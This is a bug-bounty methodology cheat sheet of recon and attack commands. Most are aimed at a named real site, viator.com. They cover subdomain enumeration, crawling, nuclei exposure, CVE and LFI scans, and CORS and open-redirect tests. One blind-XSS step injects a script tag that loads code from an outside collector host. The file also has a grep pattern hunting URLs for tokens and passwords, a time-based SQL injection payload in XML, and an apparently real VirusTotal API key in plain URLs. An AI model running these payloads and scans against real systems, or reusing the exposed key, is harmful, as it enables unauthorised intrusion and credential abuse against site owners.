এইBug Hunting methodology part 2 by Lostsec :)
----------------------------------------------------------------------------

subfinder -d viator.com -all  -recursive > subdomain.txt

cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt

katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt

cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config"

cat allurls.txt | grep -E "\.js$" >> js.txt

cat alljs.txt | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ 

echo www.viator.com | katana -ps | grep -E "\.js$" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30

dirsearch  -u https://www.viator.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json

subfinder -d viator.com | httpx-toolkit -silent |  katana -ps -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters

subzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl

python3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked"

nuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors

nuclei  -list ~/vaitor/subdomains_alive.txt -tags cve,osint,tech

cat allurls.txt | gf lfi | nuclei -tags lfi
cat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect

@lostsec 
watch recent video that i uploaded in youtube ❤️





From orwa


ffuf-u "https://FUZZ1/" -H "Host: FUZZ2" -H "User-agent: userAgent" -mc all-fc 400-200-wips.txt:FUZZ1-w domains.txt:FUZZ2-of html-o results.html

ffuf \
    -w wips.txt:FUZZ1 \
    -w domains.txt:FUZZ2 \
    -u "https://FUZZ1/" \
    -H "Host: FUZZ2" \
    -H "User-Agent: Mozilla/5.0 (Recon-Scanner)" \
    -mc all \
    -fc 400-599 \
    -ac \
    -t 50 \
    -of html \
    -o results.html




katana -u https://target.com -d 4 -c 25 -f qurl,form -headless -p headless -hr 10 -s -jc -kf -si -ef woff,css,svg,png,jpg -em php,asp,aspx,jsp,html,js -match-regex ".*admin.*|.*api.*|.*user.*|.*dashboard.*|.*config.*" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" -H "X-Forwarded-For: 127.0.0.1" -no-sandbox -timeout 20 -delay 1000 -o ultimate_scan.txt





katana -u https://target.com \
-d 5 -c 40 \
-f qurl,form,url \
-headless -p headless \
-jc -kf -s -si \
-ef woff,css,svg,png,jpg,gif,ico \
-em php,asp,aspx,jsp,html,js,json \
-match-regex ".*admin.*|.*login.*|.*api.*|.*user.*|.*dashboard.*|.*config.*|.*dev.*|.*test.*" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
-H "X-Forwarded-For: 127.0.0.1" \
-H "X-Originating-IP: 127.0.0.1" \
-H "X-Client-IP: 127.0.0.1" \
-no-sandbox \
-timeout 20 \
-delay 500 \
-o ultimate_katana_scan.txt


Virustotal:

https://www.virustotal.com/vtapi/v2/ip-address/report?apikey=351f850c4812ff153a1cccb558c5faf8f394de868fd23beca330528ebb67c342&ip=104.36.192.134

https://www.virustotal.com/gui/file/1b82738ce7da21e8c1b04a446c285ba87c5fee82f5e23cf76f818b4ea7261a0d


https://www.virustotal.com/vtapi/v2/domain/report?apikey=351f850c4812ff153a1cccb558c5faf8f394de868fd23beca330528ebb67c342&domain=kiwi.com


https://otx.alienvault.com/api/v1/indicators/{TYPE}/{DOMAIN}/url_list?limit=500

https://github.com/zack0x01/CVE-2025-55182-advanced-scanner-



grep -Ei "(\.zip|\.7z|\.exe|\.tar|\.gz|\.dll|\.iso|token=|apikey=|/resetpassword/|/registration/|==|\.com:|@|code=|\.aspx|\.ashx|\.php|\.jsp|\.cgi|\.xml|\.txt|\.xhtml)" urls.txt > filtered_urls.txt

grep -Eai '(\.zip|\.7z|\.tar|\.gz|\.rar|\.bak|\.old|\.backup|\.sql|\.db|\.sqlite|\.log|\.iso|\.dll|\.exe|token=|apikey=|api_key=|access[_-]?token|secret=|password=|passwd=|pwd=|auth=|bearer|reset(pass(word)?)?|forgot(pass(word)?)?|change(pass(word)?)?|registration|signup|==|%3D%3D|base64|@|email=|user(name)?=|code=|id=|uid=|uuid=|\.php|\.asp|\.aspx|\.ashx|\.jsp|\.cgi|\.do|\.xml|\.json|\.yaml|\.yml|\.txt|\.conf|\.env|jenkins|sonar|sonarqube|gitlab|grafana|kibana|prometheus|vault|artifactory|nexus|admin|dashboard|internal|private|debug|test|dev|staging|oauth|sso|saml|openid|callback|redirect|upload|download|export|import|graphql|graphiql|\.git|\.svn|\.hg|phpinfo|swagger|openapi)' urls.txt > sensitive_urls.txt


naabu -list sub.txt -top-ports 1000 -exclude-ports 80,443 -o file

naabu-p--list subs.txt -exclude-ports 80,443,8443,21,25,22 -o ports.txt




<strXML>
<requestList>
<request>
<id>1'; WAITFOR DELAY '00:00:05'--</id>
</request>
</requestList>
</strXML>